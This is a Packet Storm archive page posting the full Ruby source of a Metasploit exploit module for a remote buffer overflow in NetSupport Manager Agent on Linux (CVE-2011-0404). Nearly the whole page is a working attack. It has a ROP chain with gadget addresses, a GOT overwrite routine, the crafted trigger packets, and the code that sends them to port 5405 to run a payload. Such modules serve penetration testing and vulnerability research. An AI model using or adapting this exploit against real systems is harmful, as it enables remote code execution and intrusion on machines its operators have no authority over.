exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NetSupport Manager Agent Remote Buffer Overflow

NetSupport Manager Agent Remote Buffer Overflow
Posted Mar 4, 2011
Authored by Luca Carettoni, jduck, Evan | Site metasploit.com

This Metasploit module exploits a buffer overflow in NetSupport Manager Agent. It uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.

tags | exploit, overflow
advisories | CVE-2011-0404, OSVDB-70408
SHA-256 | 97cfba55ad99e70aab89080a5fd28096914ddedef3359cfe0a68bdb2d98b0bff

NetSupport Manager Agent Remote Buffer Overflow

Change Mirror Download
##
# $Id: netsupport_manager_agent.rb 11868 2011-03-03 01:04:47Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'NetSupport Manager Agent Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in NetSupport Manager Agent. It
uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.
},
'Author' =>
[
'Luca Carettoni (@_ikki)', # original discovery / exploit
'Evan', # ported from exploit-db exploit
'jduck' # original proftpd_iac ROP, minor cleanups
],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'Version' => '$Revision: 11868 $',
'References' =>
[
[ 'CVE', '2011-0404' ],
[ 'OSVDB', '70408' ],
[ 'URL', 'http://www.exploit-db.com/exploits/15937/' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 0x975,
'BadChars' => "",
'DisableNops' => true,
},
'Targets' =>
[
[ 'linux',
{
'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;
'Pad' => 975,
'RopStack' =>
[
### mmap isn't used in the binary so we need to resolve it in libc
0x00041160, # mmap64 - localtime
0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect
0xcccccccc,
0x08084662, # add DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;
0xcccccccc,
0xcccccccc,
0x080541e4, # localtime@plt (now mmap64)
0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;
0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments
0x0, # unused
0x08066332, # pop edx; pop ebx; pop ebp ;;
"\x89\x1c\xa8\xc3".unpack('V').first, # mov [eax+ebp*4], ebx
0xcccccccc,
0xcccccccc,
0x080555c4, # mov [eax] edx ; pop ebp ;;
0xcccccccc,
#0x0807385a, # push eax ; adc al 0x5d ;;

### this is the stub used to copy shellcode from the stack to
### the newly mapped executable region
#\x8D\xB4\x24\x7D\xFB\xFF # lea esi,[dword esp-0x483]
#\x8D\x78\x12 # lea edi,[eax+0x12]
#\x6A\x7F # push byte +0x7f
#\x59 # pop ecx
#\xF3\xA5 # rep movsd

### there are no good jmp eax so overwrite getrlimits GOT entry
0x0805591b, # pop ebx; pop ebp ;;
0x08092d68 - 0x4, # 08092d68 0002f007 R_386_JUMP_SLOT 00000000 getrlimit
0x1, # becomes ebp
0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;
0xfb7c24b4, # become eb
0x01,
0x08054ac4, # <getrlimit@plt>
0x0805591b, # pop ebx; pop ebp ;;
#0xffff8d78, # become ebx
0x788dffff,
0x2,
0x08054ac4, # <getrlimit@plt>
0x0805591b, # pop ebx; pop ebp ;;
0x597f6a12,
0x3,
0x08054ac4, # <getrlimit@plt>
0x0805591b, # pop ebx; pop ebp ;;
0x9090a5f2,
0x4,
0x08054ac4, # <getrlimit@plt>
0x0805591b, # pop ebx; pop ebp ;;
0x8d909090,
0x0,
0x08054ac4, # <getrlimit@plt>
0xcccccccc,
0x01010101,
]
}
]
],
'DisclosureDate' => 'Feb 12 2010',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(5405),
], self.class)
end

def exploit
connect

#pop_eax_ebx ;
#0x8084662 # add DWORD PTR [ebx+0x5e5b1cc4],eax ;;
triggerA = "\x15\x00\x5a\x00" + "\x41" * 1024 + "\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

triggerB = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00" +
"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00"

triggerC = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4" +
"\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52" +
"\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e" + #pleasure trail
#"\xcc" +
"\x90" +
payload.encoded +
"\xcc" * (target['Pad'] - payload.encoded.length) +
[target.ret].pack('V')

new = ''
if target['RopStack']
new << target['RopStack'].map { |e|
if e == 0xcccccccc
rand_text(4).unpack('V').first
else
e
end
}.pack('V*')
end

triggerC << new
triggerC << "\x00" * 4
triggerC << "\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32"
triggerC << "\x30\x00\x31\x30\x00\x00"

triggerD = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00" +
"\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07" +
"\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00" +
"\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00"

print_status("Sending A")
sock.put(triggerA)
select(nil, nil, nil, 1)

print_status("Sending B")
sock.put(triggerB)
select(nil, nil, nil, 1)

print_status("Sending C")
sock.put(triggerC)
select(nil, nil, nil, 1)

print_status("Sending D")
sock.put(triggerD)
select(nil, nil, nil, 1)

disconnect
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close